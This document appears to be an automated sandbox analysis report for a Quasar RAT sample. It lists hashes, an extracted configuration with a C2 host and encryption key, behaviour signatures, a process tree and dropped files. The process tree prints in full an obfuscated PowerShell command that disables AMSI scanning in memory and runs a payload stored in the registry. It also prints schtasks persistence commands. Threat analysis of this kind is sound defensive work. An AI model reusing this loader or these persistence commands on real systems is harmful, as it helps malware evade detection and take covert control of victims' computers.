Analysis

  • max time kernel
    150s
  • max time network
    134s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-05-2024 20:59

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 57 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:556
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1012
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{46754dba-6dc1-4fcc-8e05-b73ad73504c5}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4904
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:636
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:740
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:904
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
              1⤵
                PID:700
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                1⤵
                  PID:588
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                  1⤵
                    PID:828
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                    1⤵
                      PID:1064
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:1120
                        • c:\windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:3188
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XFBFLPNOhFSi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HxYRqXtRgHQfAt,[Parameter(Position=1)][Type]$npfPkjKtXU)$UEVESBBeKZX=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+'d'+''+'u'+'le',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+'e'+'','C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+'A'+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'ass'+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+'C'+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$UEVESBBeKZX.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+'ci'+'a'+'l'+[Char](78)+'a'+[Char](109)+'e'+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$HxYRqXtRgHQfAt).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+'d'+'');$UEVESBBeKZX.DefineMethod(''+'I'+'n'+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+'c'+','+''+[Char](72)+'id'+'e'+''+'B'+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+'N'+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+[Char](97)+'l',$npfPkjKtXU,$HxYRqXtRgHQfAt).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+'im'+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $UEVESBBeKZX.CreateType();}$DkHnQcqQqyiFj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'f'+'e'+''+'N'+'a'+'t'+'iv'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+'o'+''+[Char](100)+''+[Char](115)+'');$YUXgmYSFMdjTQp=$DkHnQcqQqyiFj.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OaTVqtoYTdPSqPOphTs=XFBFLPNOhFSi @([String])([IntPtr]);$MoEwWJiVxrImEmOuVprtba=XFBFLPNOhFSi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AYMVTQYYIhZ=$DkHnQcqQqyiFj.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+'32'+'.'+''+'d'+'l'+[Char](108)+'')));$XNEuzGHkQiIYtW=$YUXgmYSFMdjTQp.Invoke($Null,@([Object]$AYMVTQYYIhZ,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+'L'+'i'+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$PehuIdZilMZFzVRCR=$YUXgmYSFMdjTQp.Invoke($Null,@([Object]$AYMVTQYYIhZ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+'o'+'t'+''+'e'+''+'c'+''+[Char](116)+'')));$gKgzYgU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XNEuzGHkQiIYtW,$OaTVqtoYTdPSqPOphTs).Invoke(''+'a'+'m'+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$coHxVhaugNkpusFxG=$YUXgmYSFMdjTQp.Invoke($Null,@([Object]$gKgzYgU,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+'S'+''+'c'+'a'+'n'+''+[Char](66)+'u'+'f'+''+[Char](102)+''+'e'+'r')));$VKZFxLXspm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PehuIdZilMZFzVRCR,$MoEwWJiVxrImEmOuVprtba).Invoke($coHxVhaugNkpusFxG,[uint32]8,4,[ref]$VKZFxLXspm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$coHxVhaugNkpusFxG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PehuIdZilMZFzVRCR,$MoEwWJiVxrImEmOuVprtba).Invoke($coHxVhaugNkpusFxG,[uint32]8,0x20,[ref]$VKZFxLXspm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3844
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s nsi
                          1⤵
                            PID:1164
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1244
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                              1⤵
                                PID:1252
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                1⤵
                                  PID:1268
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                  1⤵
                                    PID:1372
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                    1⤵
                                      PID:1420
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                      1⤵
                                        PID:1448
                                        • c:\windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:3100
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                          1⤵
                                            PID:1512
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                            1⤵
                                              PID:1564
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                              1⤵
                                                PID:1588
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1652
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1784
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1792
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                      1⤵
                                                        PID:1808
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                        1⤵
                                                          PID:1816
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                          1⤵
                                                            PID:1884
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1972
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                              1⤵
                                                                PID:2060
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                1⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2148
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                1⤵
                                                                  PID:2328
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                  1⤵
                                                                    PID:2336
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                    1⤵
                                                                      PID:2372
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                      1⤵
                                                                        PID:2428
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                        1⤵
                                                                          PID:2532
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                          1⤵
                                                                            PID:2540
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2560
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                              1⤵
                                                                                PID:2580
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                1⤵
                                                                                  PID:2596
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2808
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                    1⤵
                                                                                      PID:3116
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                      1⤵
                                                                                        PID:3228
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3360
                                                                                          • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                            2⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2752
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:3840
                                                                                            • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:756
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                4⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:5048
                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5032
                                                                                            • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                              "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:5020
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3908
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                            1⤵
                                                                                              PID:2936
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                              1⤵
                                                                                                PID:4788
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:4536
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4320
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2700
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                  1⤵
                                                                                                    PID:2804
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    PID:4736
                                                                                                  • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                    C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:1844
                                                                                                    • C:\Windows\System32\InstallAgent.exe
                                                                                                      C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4656
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                        1⤵
                                                                                                          PID:4940
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1400

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                          Filesize

                                                                                                          162KB

                                                                                                          MD5

                                                                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                          SHA1

                                                                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                          SHA256

                                                                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                          SHA512

                                                                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                        • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                          Filesize

                                                                                                          409KB

                                                                                                          MD5

                                                                                                          a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                          SHA1

                                                                                                          3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                          SHA256

                                                                                                          43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                          SHA512

                                                                                                          458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_o0vy2cf1.xo5.ps1
                                                                                                          Filesize

                                                                                                          1B

                                                                                                          MD5

                                                                                                          c4ca4238a0b923820dcc509a6f75849b

                                                                                                          SHA1

                                                                                                          356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                          SHA256

                                                                                                          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                          SHA512

                                                                                                          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                        • memory/556-73-0x000001CDA5A60000-0x000001CDA5A8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/556-74-0x00007FFFAEA20000-0x00007FFFAEA30000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/556-67-0x000001CDA5A60000-0x000001CDA5A8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/556-66-0x000001CDA5A60000-0x000001CDA5A8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/556-65-0x000001CDA5A30000-0x000001CDA5A55000-memory.dmp
                                                                                                          Filesize

                                                                                                          148KB

                                                                                                        • memory/636-84-0x000002C98B8B0000-0x000002C98B8DB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/636-85-0x00007FFFAEA20000-0x00007FFFAEA30000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/636-78-0x000002C98B8B0000-0x000002C98B8DB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/740-96-0x00007FFFAEA20000-0x00007FFFAEA30000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/740-95-0x000001B90DE80000-0x000001B90DEAB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/740-89-0x000001B90DE80000-0x000001B90DEAB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/756-672-0x0000000073CE0000-0x00000000743CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/756-673-0x0000000073CE0000-0x00000000743CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/756-47-0x00000000065D0000-0x00000000065DA000-memory.dmp
                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/756-14-0x0000000073CE0000-0x00000000743CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/756-13-0x0000000073CE0000-0x00000000743CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/904-106-0x0000020DD13A0000-0x0000020DD13CB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/904-100-0x0000020DD13A0000-0x0000020DD13CB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/904-107-0x00007FFFAEA20000-0x00007FFFAEA30000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/1012-111-0x0000019E10C40000-0x0000019E10C6B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/2752-20-0x0000000073CE0000-0x00000000743CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/2752-7-0x0000000005AD0000-0x0000000005B0E000-memory.dmp
                                                                                                          Filesize

                                                                                                          248KB

                                                                                                        • memory/2752-6-0x00000000056E0000-0x00000000056F2000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/2752-1-0x00000000001A0000-0x000000000020C000-memory.dmp
                                                                                                          Filesize

                                                                                                          432KB

                                                                                                        • memory/2752-0-0x0000000073CEE000-0x0000000073CEF000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2752-5-0x0000000004A60000-0x0000000004AC6000-memory.dmp
                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/2752-4-0x0000000073CE0000-0x00000000743CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/2752-3-0x0000000004AE0000-0x0000000004B72000-memory.dmp
                                                                                                          Filesize

                                                                                                          584KB

                                                                                                        • memory/2752-2-0x0000000004FE0000-0x00000000054DE000-memory.dmp
                                                                                                          Filesize

                                                                                                          5.0MB

                                                                                                        • memory/3844-50-0x00007FFFEE860000-0x00007FFFEE90E000-memory.dmp
                                                                                                          Filesize

                                                                                                          696KB

                                                                                                        • memory/3844-49-0x00007FFFEE990000-0x00007FFFEEB6B000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.9MB

                                                                                                        • memory/3844-48-0x0000017D5C860000-0x0000017D5C88A000-memory.dmp
                                                                                                          Filesize

                                                                                                          168KB

                                                                                                        • memory/3844-28-0x0000017D5CA10000-0x0000017D5CA86000-memory.dmp
                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/3844-25-0x0000017D5C8E0000-0x0000017D5C902000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4904-62-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4904-61-0x00007FFFEE860000-0x00007FFFEE90E000-memory.dmp
                                                                                                          Filesize

                                                                                                          696KB

                                                                                                        • memory/4904-60-0x00007FFFEE990000-0x00007FFFEEB6B000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.9MB

                                                                                                        • memory/4904-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4904-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4904-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4904-59-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4904-54-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB